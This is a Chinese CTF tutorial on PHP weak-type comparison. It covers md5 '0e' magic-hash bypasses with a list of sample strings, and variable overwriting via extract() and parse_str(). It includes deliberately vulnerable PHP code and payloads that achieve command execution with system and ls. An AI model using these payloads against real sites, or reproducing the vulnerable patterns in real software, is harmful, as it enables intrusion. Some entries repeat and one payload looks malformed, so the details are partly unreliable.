数字与字符串比较

比较操作符:

**===**:在比较之前,会比较两边的类型是否相同,若相同再进行比较

**==**:在比较时,若两边类型不同,且一边是字符串或含有数字的字符串,另一边是数字,那么会将字符串转换为数字再进行比较

例如:

1
2
3
4
1admin==1	//true
1a23==123 //flase
admin==0 //true
0e123456==0e56789 //true

在进行字符串和数字的弱类型比较时,字符串的一开始部分就决定了它的值,

当数字后出现e或E时,系统会将其视为科学计算法,例如0e123456==0e56789=0

CTF之md5绕过

md5绕过主要使用了科学计数法的原理

1
2
3
4
5
6
7
8
9
10
$md51 = md5('QNKCDZO');//md5=0e830400451993494058024219903391
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "nctf{*****************}";
} else {
echo "false!!!";
}}
else{echo "please input a";}

以上要满足$a != ‘QNKCDZO’ && $md51 == $md52

由于md5(‘QNKCDZO’);//md5=0e830400451993494058024219903391

只要找到一个在md5编码后为0e开头的字符串就可以了

下面给出几个例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

注意:

bool类型的true跟任意类型的字符串都相等

变量覆盖问题:

变量覆盖:在一个变量已被赋值的基础上,再次对该变量赋值,覆盖掉了原来的值

变量覆盖问题:对一些函数的使用不当导致信息泄露

经常发生在以下两个函数里:

extract()

parse_str()

extract()

定义和用法

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

该函数返回成功设置的变量数目。

例如:

1
2
3
4
5
<?php 
$arr=$_GET['arr'];
extract($arr);
@$d($_POST['a']);
?>

GET : ?arr[d]=system

POST : a=ls

image-20240101223415268

在这里对变量d进行了覆盖,进而得以访问文件目录,达到攻击

parse_str()

定义与使用:

该函数与extract()函数类似,只是括号内的格式不一样

parse_str(“name=Peter&age=43”);

将等号前的字符串作为变量名,等号后的字符串作为变量值

例如:

1
2
3
4
5
<?php 
$arr=$_GET['arr'];
parse_str($arr);
@$d($_POST['a']);
?>

payload:

GET : ?id=arr=d=system

POST : a=ls